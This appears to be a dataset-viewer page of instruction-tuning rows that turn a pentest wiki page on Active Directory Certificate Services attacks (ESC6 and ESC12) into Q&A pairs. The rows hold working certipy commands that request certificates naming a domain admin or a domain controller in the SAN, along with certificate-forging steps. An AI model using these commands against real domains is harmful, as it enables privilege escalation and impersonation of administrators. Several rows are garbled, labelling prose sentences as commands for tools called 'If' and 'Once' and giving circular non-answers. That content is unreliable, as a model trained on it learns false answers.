When the flag is set on the CA, templates configured for authentication (i.e. EKUs like Client Authenticat... | {
"corpus_index": 36,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Explain the practical steps for Certificate authority - Certificate Authority misconfiguration | In their research papers, Will Schroeder and Lee Christensen found a domain escalation vector based on a dangerous CA setting (i.e. the EDITF_ATTRIBUTESUBJECTALTNAME2 flag). The escalation vector was dubbed ESC6.
When the flag is set on the CA, templates configured for authentication (i.e. EKUs like Client Authenticat... | {
"corpus_index": 36,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "How does Certificate... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | How does Certificate authority - YubiHSM Key Storage Provider work? | As described by Hans-Joachim Knobloch in his article ESC12 – Shell access to ADCS CA with YubiHSM, administrators may configure the Certificate Authority to store its private key on an external device like "Yubico YubiHSM2", over storing it in the software storage.
This is a USB device connected to the CA server via a... | {
"corpus_index": 37,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How to execute Certificate authority - YubiHSM Key Storage Provider? | As described by Hans-Joachim Knobloch in his article ESC12 – Shell access to ADCS CA with YubiHSM, administrators may configure the Certificate Authority to store its private key on an external device like "Yubico YubiHSM2", over storing it in the software storage.
This is a USB device connected to the CA server via a... | {
"corpus_index": 37,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Describe Certificate... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Describe Certificate authority - (ESC6) EDITF_ATTRIBUTESUBJECTALTNAME2 in the context of penetration testing | ::: tabs
=== UNIX-like
From UNIX-like systems, Certipy (Python) can be used to enumerate info about the CAs, including the "User Specified SAN" flag state which is an alias to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.
``bash
certipy find -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -stdout | grep "User Specified... | {
"corpus_index": 38,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Show me how to do Certificate authority - (ESC6) EDITF_ATTRIBUTESUBJECTALTNAME2 | ::: tabs
=== UNIX-like
From UNIX-like systems, Certipy (Python) can be used to enumerate info about the CAs, including the "User Specified SAN" flag state which is an alias to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.
``bash
certipy find -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -stdout | grep "User Specified... | {
"corpus_index": 38,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."
},
{
"role": "user",
"content": "How do I use certipy for ... | You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps. | How do I use certipy for certificate authority - (esc6) editf_attributesubjectaltname2? | certipy find -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -stdout | grep "User Specified SAN" | {
"corpus_index": 39,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "tool_command",
"tool": "certipy"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | What are the steps for Certificate authority - (ESC6) EDITF_ATTRIBUTESUBJECTALTNAME2? | certipy find -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -stdout | grep "User Specified SAN" | {
"corpus_index": 39,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "attack_command"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What does this comma... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What does this command do: `certipy find -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -stdout | grep "User Specified SAN"`? | This command is used for certificate authority - (esc6) editf_attributesubjectaltname2. (ESC6) EDITF_ATTRIBUTESUBJECTALTNAME2 | {
"corpus_index": 39,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "cmd_explain"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What should I know a... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What should I know about To specify a user account in the SAN? | certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin' | {
"corpus_index": 40,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How to execute To specify a user account in the SAN? | certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin' | {
"corpus_index": 40,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Explain To specify a... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Explain To specify a computer account in the SAN | certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'
``
The certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.
=== Windows
From Windows systems, the Certify (C#) tool can be used to enumerate info abou... | {
"corpus_index": 41,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How would I carry out To specify a computer account in the SAN during a pentest? | certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'
``
The certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.
=== Windows
From Windows systems, the Certify (C#) tool can be used to enumerate info abou... | {
"corpus_index": 41,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."
},
{
"role": "user",
"content": "Give me the If command to... | You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps. | Give me the If command to to specify a computer account in the san | If the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll. | {
"corpus_index": 42,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "tool_command",
"tool": "If"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Show me how to do To specify a computer account in the SAN | If the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll. | {
"corpus_index": 42,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "attack_command"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What does this comma... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What does this command do: `If the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll.`? | This command is used for to specify a computer account in the san. To specify a computer account in the SAN | {
"corpus_index": 42,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "cmd_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."
},
{
"role": "user",
"content": "Show me the Once command ... | You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps. | Show me the Once command for to specify a computer account in the san | Once the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`). | {
"corpus_index": 43,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "tool_command",
"tool": "Once"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | Explain the practical steps for To specify a computer account in the SAN | Once the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`). | {
"corpus_index": 43,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "attack_command"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "What does this comma... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | What does this command do: `Once the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`).`? | This command is used for to specify a computer account in the san. To specify a computer account in the SAN | {
"corpus_index": 43,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "cmd_explain"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Give me an overview ... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Give me an overview of Certificate authority - Redirect the USB device server | ::: tabs
=== UNIX-like
At the time of writing, no solution exists to perform this attack from a UNIX-like machine.
=== Windows
From a Windows machine, if the YubiHSM device is connected through a USB device server, with sufficient administrative access to this server it could be possible to redirect the YubiHSM con... | {
"corpus_index": 44,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How do I perform Certificate authority - Redirect the USB device server? | ::: tabs
=== UNIX-like
At the time of writing, no solution exists to perform this attack from a UNIX-like machine.
=== Windows
From a Windows machine, if the YubiHSM device is connected through a USB device server, with sufficient administrative access to this server it could be possible to redirect the YubiHSM con... | {
"corpus_index": 44,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."
},
{
"role": "user",
"content": "Explain Certificate ... | You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved. | Explain Certificate authority - Forge a certificate | If the CA's private key is stored on a physical USB device such as "YubiHSM2", and a shell access is obtained on the PKI server (even with low privileges), it is possible to modify and sign new certificates.
This can be used to replicate an ESC1 abuse path and impersonate privileged users.
::: tabs
=== UNIX-like
A... | {
"corpus_index": 45,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "concept_explain"
} |
[
{
"role": "system",
"content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, fla... | You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax. | How do I perform Certificate authority - Forge a certificate? | If the CA's private key is stored on a physical USB device such as "YubiHSM2", and a shell access is obtained on the PKI server (even with low privileges), it is possible to modify and sign new certificates.
This can be used to replicate an ESC1 abuse path and impersonate privileged users.
::: tabs
=== UNIX-like
A... | {
"corpus_index": 45,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "technique_howto"
} |
[
{
"role": "system",
"content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."
},
{
"role": "user",
"content": "What is the certipy synta... | You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps. | What is the certipy syntax for certificate authority - forge a certificate? | certipy req -target $ADCS_HOST -dc-ip $DC_IP -u "$USER@$DOMAIN" -p '$PASSWORD' -template User -ca <CA-Common-Name>
certipy cert -pfx user_esc12.pfx -nokey -out user_esc12.crt
certipy cert -pfx user_esc12.pfx -nocert -out user_esc12.key | {
"corpus_index": 46,
"category": "crypto",
"source_file": "docs/src/ad/movement/adcs/certificate-authority.md",
"page_title": "Certificate authority",
"augmentation_kind": "none",
"row_kind": "tool_command",
"tool": "certipy"
} |
End of preview. Expand in Data Studio
README.md exists but content is empty.
- Downloads last month
- 31